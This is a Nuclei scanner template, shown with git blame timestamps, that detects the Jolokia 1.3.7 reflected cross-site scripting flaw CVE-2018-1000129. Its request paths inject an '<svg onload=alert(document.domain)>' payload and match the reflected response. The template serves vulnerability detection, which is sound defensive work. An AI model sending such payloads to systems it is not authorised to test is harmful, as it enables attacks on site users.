nuclei-templates/http/cves/2018/CVE-2018-1000129.yaml

59 lines
2.2 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-1000129
info:
name: Jolokia 1.3.7 - Cross-Site Scripting
2022-05-16 23:31:59 +00:00
author: mavericknerd,0h1in9e,daffainfo
severity: medium
2022-05-17 06:56:18 +00:00
description: |
Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
2022-05-16 23:31:59 +00:00
- https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
- https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000129
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-1000129
cwe-id: CWE-79
epss-score: 0.00257
2024-05-31 19:23:20 +00:00
epss-percentile: 0.65435
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: jolokia
product: jolokia
2024-01-14 09:21:50 +00:00
tags: cve2018,cve,jolokia,xss
http:
- method: GET
path:
2022-05-16 23:31:59 +00:00
- "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
- "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: word
2022-05-16 23:31:59 +00:00
part: body
words:
2020-09-01 12:42:12 +00:00
- "<svg onload=alert(document.domain)>"
2022-05-16 23:31:59 +00:00
- "java.lang.IllegalArgumentException"
- "No type with name"
condition: and
2020-09-01 12:42:12 +00:00
- type: word
2022-05-16 23:31:59 +00:00
part: header
2020-09-01 12:42:12 +00:00
words:
- "text/html"
2022-05-17 06:55:30 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100d13910ea51e10912ef8a7920f88602a7c375f607fd520c36d87b3e87222226ca02205885520f34c9569d052fafa49195b92d66c1d535316bea0686be5d5a582f3365:922c64590222798bb761d5b6d8e72950